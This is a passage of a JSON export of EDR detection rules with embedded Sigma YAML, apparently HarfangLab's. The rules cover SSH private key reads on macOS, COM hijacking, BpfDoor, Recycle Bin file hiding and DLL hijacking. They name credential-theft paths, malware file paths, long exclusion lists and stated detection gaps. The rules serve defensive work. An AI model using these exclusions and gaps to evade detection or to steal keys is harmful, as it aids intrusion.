"rule_description": "Detects the loading of specific DLLs related to BindFilter redirection mechanisms, which may indicate attempts to manipulate Windows filter driver bindings for filesystem redirection.\nEDR-Redir, a tool developed by TwoSevenOneT, is known to target EDR solutions by using a BindFilter (mini filter bindflt.sys) and the Windows Cloud Filter API (cldflt.sys) to redirect the EDR's working folder to a folder of the attacker's choice.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2025-11-03",
"rule_modified_date": "2025-12-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3831a1a6-cce1-43aa-b3f7-73f2c207a8a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607792Z",
"creation_date": "2026-03-23T11:45:34.607796Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607803Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/004/"
],
"name": "t1552_004_ssh_private_key_read_macos.yml",
"content": "title: SSH Private Key Read (macOS)\nid: 3831a1a6-cce1-43aa-b3f7-73f2c207a8a4\ndescription: |\n Detects an attempt to read the content of an SSH private key.\n The private key is the most important and secretive piece of data used when connecting to a remote host via SSH.\n An attacker can read the SSH private keys available on a compromised system to connect to other remote hosts and impersonate an existing user or service.\n It is recommended to verify if the process performing the read operation has legitimate reason to do it.\nreferences:\n - https://attack.mitre.org/techniques/T1552/004/\ndate: 2024/06/18\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.004\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Path: '/Users/*/.ssh/*'\n ProcessImage|contains: '?'\n\n selection_read_access:\n Kind: 'read'\n\n filter_ssh:\n Image:\n - '/usr/bin/ssh'\n - '/usr/bin/sshd'\n - '/usr/sbin/sshd'\n - '/usr/bin/ssh-keygen'\n - '/usr/bin/ssh-add'\n - '/opt/homebrew/Cellar/openssh/*/bin/ssh'\n\n filter_benign:\n Path|endswith:\n - '/authorized_keys*'\n - '.pub'\n - 'config'\n - 'known_hosts'\n - '/.ssh/config'\n - '/.ssh/config-sb*'\n - '/env*'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/nix/'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - 
'/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - 
'/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_misc:\n Image|endswith:\n - '/python*'\n - '/ruby'\n - '/usr/bin/pico'\n - '/usr/bin/vim'\n\n exclusion_virtualmachine:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n exclusion_cyberduck:\n Image: '/Applications/Cyberduck.app/Contents/MacOS/Cyberduck'\n\n exclusion_dbeaver:\n Image: '/Users/*/Applications/DBeaver.app/Contents/MacOS/dbeaver'\n\n exclusion_xcode:\n Image:\n - 
'/Applications/Xcode*.app/Contents/SharedFrameworks/DVTSourceControl.framework/Versions/A/XPCServices/com.apple.dt.Xcode.sourcecontrol.Git.xpc/Contents/MacOS/com.apple.dt.Xcode.sourcecontrol.Git'\n - '/Applications/Xcode*.app/Contents/SharedFrameworks/DVTSourceControl.framework/Versions/A/XPCServices/com.apple.dt.Xcode.sourcecontrol.SSHHelper.xpc/Contents/MacOS/com.apple.dt.Xcode.sourcecontrol.SSHHelper'\n exclusion_tabletops:\n Image: '/Applications/TablePlus.app/Contents/MacOS/TablePlus'\n\n exclusion_docker:\n Image: '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n\n exclusion_filezilla:\n Image:\n - '/Applications/FileZilla.app/Contents/MacOS/fzputtygen'\n - '/Applications/FileZilla.app/Contents/MacOS/fzsftp'\n - '/Users/*/Downloads/FileZilla 2.app/Contents/MacOS/fzsftp'\n\n exclusion_git_misc_app:\n Image:\n - '/Applications/GitKraken.app/Contents/Frameworks/GitKraken Helper (Renderer).app/Contents/MacOS/GitKraken Helper (Renderer)'\n - '/Applications/GitHub Desktop.app/Contents/Frameworks/GitHub Desktop Helper (Renderer).app/Contents/MacOS/GitHub Desktop Helper (Renderer)'\n\n exclusion_flintrock:\n Image|endswith:\n - '/flintrock-*-standalone-macOS-arm64/flintrock'\n - '/usr/local/bin/flintrock'\n\n exclusion_vanta:\n Image: '/usr/local/vanta/osqueryd'\n\n exclusion_rider:\n Image: '/Applications/Rider.app/Contents/MacOS/rider'\n\n exclusion_homebrew:\n Image|startswith: '/opt/homebrew/'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_textedit:\n Image: '/System/Applications/TextEdit.app/Contents/MacOS/TextEdit'\n\n exclusion_ssh:\n Image:\n - '/usr/bin/ssh'\n - '/usr/local/Cellar/openssh/*/bin/ssh'\n\n exclusion_haxm:\n Image: '/usr/local/haxm/*/haxm'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'Agent_final'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3831a1a6-cce1-43aa-b3f7-73f2c207a8a4",
"rule_name": "SSH Private Key Read (macOS)",
"rule_description": "Detects an attempt to read the content of an SSH private key.\nThe private key is the most important and secretive piece of data used when connecting to a remote host via SSH.\nAn attacker can read the SSH private keys available on a compromised system to connect to other remote hosts and impersonate an existing user or service.\nIt is recommended to verify if the process performing the read operation has legitimate reason to do it.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-04-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "386d04d2-1f3a-463b-a003-5ef7c4109f79",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085652Z",
"creation_date": "2026-03-23T11:45:34.085654Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085658Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.r-tec.net/r-tec-blog-revisiting-cross-session-activation-attacks.html",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1546_015_com_hijacking_remote_registry.yml",
"content": "title: COM Hijacking via Remote Registry\nid: 386d04d2-1f3a-463b-a003-5ef7c4109f79\ndescription: |\n Detects the modification of the registry key related to a COM interface configuration by the remote registry process.\n Adversaries may use COM hijacking in order to execute code in the context of a logged-on user remotely.\n It is recommended to check the content of the targeted DLL for malicious content as well as to look for suspicious processes spawning after this alert as a result of a successful COM hijack.\nreferences:\n - https://www.r-tec.net/r-tec-blog-revisiting-cross-session-activation-attacks.html\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2025/07/10\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.015\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\Classes\\CLSID\\{????????-????-????-????-????????????}\\'\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "386d04d2-1f3a-463b-a003-5ef7c4109f79",
"rule_name": "COM Hijacking via Remote Registry",
"rule_description": "Detects the modification of the registry key related to a COM interface configuration by the remote registry process.\nAdversaries may use COM hijacking in order to execute code in the context of a logged-on user remotely.\nIt is recommended to check the content of the targeted DLL for malicious content as well as to look for suspicious processes spawning after this alert as a result of a successful COM hijack.\n",
"rule_creation_date": "2025-07-10",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3894297f-12bc-492b-b25b-554856e8df30",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088159Z",
"creation_date": "2026-03-23T11:45:34.088161Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088165Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor",
"https://dfir.ch/posts/strace/",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor",
"https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_bpfdoor_suspicious_file_creation.yml",
"content": "title: Suspicious Execution Related to BpfDoor\nid: 3894297f-12bc-492b-b25b-554856e8df30\ndescription: |\n Detects the execution of files with names linked to the BpfDoor backdoor.\n BpfDoor is a remote access trojan (RAT) used by the Red Menshen threat actor to target Linux systems since at least 2018.\n This file is executed by BpfDoor as part of its initialization process.\n It is recommended to analyze the process responsible for creating this file and to look for other suspicious activities on the host.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor\n - https://dfir.ch/posts/strace/\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor\n - https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2024/02/02\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Malware.BpfDoor\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n - Image: '/dev/shm/kdmtmpflush'\n - CommandLine|contains: '/dev/shm/kdmtmpflush'\n\n # seen launched by ssh and child of nessusd\n exclusion_nessus:\n CommandLine:\n - '*/bin/ls -alR /proc/*/exe 2> /dev/null | grep \"/dev/shm/kdmtmpflush (deleted)\"*'\n - 'grep /dev/shm/kdmtmpflush (deleted)'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3894297f-12bc-492b-b25b-554856e8df30",
"rule_name": "Suspicious Execution Related to BpfDoor",
"rule_description": "Detects the execution of files with names linked to the BpfDoor backdoor.\nBpfDoor is a remote access trojan (RAT) used by the Red Menshen threat actor to target Linux systems since at least 2018.\nThis file is executed by BpfDoor as part of its initialization process.\nIt is recommended to analyze the process responsible for creating this file and to look for other suspicious activities on the host.\n",
"rule_creation_date": "2024-02-02",
"rule_modified_date": "2025-04-08",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3899410e-4d11-427a-b57d-07ca42d4c51f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084966Z",
"creation_date": "2026-03-23T11:45:34.084968Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084972Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_suspicious_file_into_recycle_bin.yml",
"content": "title: Suspicious File Created inside Recycle Bin folder\nid: 3899410e-4d11-427a-b57d-07ca42d4c51f\ndescription: |\n Detects a suspicious attempt to create files into the Recycle Bin folder.\n This folder can be used by attackers to hide their files from regular users.\n It is recommended to check the created file for suspicious content as well as to analyze the process at the origin of this creation for other suspicious behavior.\nreferences:\n - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2021/08/06\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|startswith: '?:\\\\?Recycle.Bin\\\\*'\n\n exclusion_legitimatefiles:\n Path:\n - '?:\\\\?Recycle.Bin\\S-1-5-18'\n - '?:\\\\?Recycle.Bin\\S-1-*-???'\n - '?:\\\\?Recycle.Bin\\S-1-*-????'\n - '?:\\\\?Recycle.Bin\\S-1-*-?????'\n - '?:\\\\?Recycle.Bin\\S-1-*-??????'\n - '?:\\\\?Recycle.Bin\\S-1-*-???????'\n - '?:\\\\?Recycle.Bin\\S-1-*-????????'\n - '?:\\\\?Recycle.Bin\\S-1-*-?????????'\n - '?:\\\\?Recycle.Bin\\S-1-*-??????????'\n - '?:\\\\?Recycle.Bin\\S-1*\\\\?R*'\n - '?:\\\\?Recycle.Bin\\S-1*\\\\?I*'\n - '?:\\\\?Recycle.Bin\\\\?R*'\n - '?:\\\\?Recycle.Bin\\\\?I*'\n\n exclusion_ahnlab:\n Image: '?:\\Program Files\\AhnLab\\Safe Transaction\\ASDSvc.exe'\n #ProcessParentImage|endswith: '\\services.exe'\n\n exclusion_desktop:\n Path:\n - '?:\\\\?Recycle.Bin\\S-1-*\\desktop.ini'\n - '?:\\\\?Recycle.Bin\\desktop.ini'\n\n exclusion_bromium:\n Image:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n Path: '*\\~BROMIUM' # HP Bromium\n\n exclusion_office:\n # C:\\$Recycle.Bin\\S-1-5-21-802770577-1178448740-...\\~$$R8V0GFK.xlsb\n # 
C:\\$Recycle.Bin\\S-1-5-21-802770577-1178448740-...\\~$$RQZH0TL.xlsb\n Image:\n - '?:\\Program Files\\Microsoft Office\\Office1?\\EXCEL.EXE'\n - '?:\\Program Files\\Microsoft Office\\root\\Office1?\\EXCEL.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office1?\\EXCEL.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office1?\\EXCEL.EXE'\n - '?:\\Program Files\\Microsoft Office\\Office1?\\WINWORD.EXE'\n - '?:\\Program Files\\Microsoft Office\\root\\Office1?\\WINWORD.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office1?\\WINWORD.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office1?\\WINWORD.EXE'\n - '?:\\Program Files\\Microsoft Office\\Office1?\\POWERPNT.EXE'\n - '?:\\Program Files\\Microsoft Office\\root\\Office1?\\POWERPNT.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office1?\\POWERPNT.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office1?\\POWERPNT.EXE'\n Path:\n - '*\\~$$???????.xlsb'\n - '*\\~$??????.odt'\n - '*\\~$$???????.pptx'\n\n exclusion_symantec:\n ProcessOriginalFileName: 'ccSvcHst.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_rm:\n ProcessImage|endswith: '\\bin\\rm.exe'\n\n exclusion_rsync:\n ProcessImage:\n - '?:\\Program Files (x86)\\cwRsync\\bin\\rsync.exe'\n - '?:\\Program Files (x86)\\ICW\\Bin\\rsync.exe'\n - '?:\\cygwin\\bin\\rsync.exe'\n - '?:\\cygwin64\\bin\\rsync.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3899410e-4d11-427a-b57d-07ca42d4c51f",
"rule_name": "Suspicious File Created inside Recycle Bin folder",
"rule_description": "Detects a suspicious attempt to create a file in the Recycle Bin folder.\nThis folder can be used by attackers to hide their files from regular users.\nFiles following the standard $R/$I naming under a per-user SID subfolder, desktop.ini, and known temporary files written by Office, Symantec, AhnLab, rm and rsync are excluded; note that a planted file mimicking the $R/$I naming will therefore not alert.\nIt is recommended to check the created file for suspicious content as well as to analyze the process at the origin of this creation for other suspicious behavior.\n",
"rule_creation_date": "2021-08-06",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "38af1190-9bbe-40bc-8df7-d4fb515ccd0e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090689Z",
"creation_date": "2026-03-23T11:45:34.090691Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090696Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sgrmbroker.yml",
"content": "title: DLL Hijacking via SgrmBroker.exe\nid: 38af1190-9bbe-40bc-8df7-d4fb515ccd0e\ndescription: |\n Detects potential Windows DLL Hijacking via SgrmBroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SgrmBroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ncrypt.dll'\n - '\\tbs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "38af1190-9bbe-40bc-8df7-d4fb515ccd0e",
"rule_name": "DLL Hijacking via SgrmBroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SgrmBroker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nThe rule alerts when a Microsoft-signed SgrmBroker.exe loads ncrypt.dll or tbs.dll, unless the process or the library resides under System32, SysWOW64 or WinSxS, or the library itself is signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39035abb-812f-4e80-93a0-a5b682e2caa4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619038Z",
"creation_date": "2026-03-23T11:45:34.619039Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619044Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dmomacpmo.yml",
